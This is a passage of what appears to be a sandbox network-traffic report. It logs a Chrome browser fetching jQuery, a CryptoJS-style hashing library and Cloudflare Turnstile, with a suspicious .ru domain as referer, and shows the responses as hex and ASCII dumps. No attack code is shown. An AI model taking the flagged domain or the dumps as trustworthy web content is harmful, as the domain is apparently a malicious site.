                                                                                                            Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a
                                                                                                            Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
                                                                                                            Data Ascii: charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68
                                                                                                            Data Ascii: (a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=th
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                                                                            Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.449749151.101.2.1374435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:41 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                            Host: code.jquery.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Referer: https://tf6.jqugbctcds.ru/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:41 UTC612INHTTP/1.1 200 OK
                                                                                                            Connection: close
                                                                                                            Content-Length: 89501
                                                                                                            Server: nginx
                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                            Accept-Ranges: bytes
                                                                                                            Date: Sat, 21 Dec 2024 23:46:41 GMT
                                                                                                            Age: 309327
                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740050-EWR
                                                                                                            X-Cache: HIT, HIT
                                                                                                            X-Cache-Hits: 2774, 5
                                                                                                            X-Timer: S1734824801.467897,VS0,VE0
                                                                                                            Vary: Accept-Encoding
                                                                                                            2024-12-21 23:46:41 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                            2024-12-21 23:46:41 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                            2024-12-21 23:46:41 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                            2024-12-21 23:46:42 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                            2024-12-21 23:46:42 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                            2024-12-21 23:46:42 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.449751104.18.94.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:41 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Referer: https://tf6.jqugbctcds.ru/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:41 UTC386INHTTP/1.1 302 Found
                                                                                                            Date: Sat, 21 Dec 2024 23:46:41 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                            location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0c12d1b0f9c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.449752104.18.94.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:42 UTC648OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Referer: https://tf6.jqugbctcds.ru/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:43 UTC471INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:43 GMT
                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                            Content-Length: 47692
                                                                                                            Connection: close
                                                                                                            accept-ranges: bytes
                                                                                                            last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                            access-control-allow-origin: *
                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0cb8d42c47a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:43 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
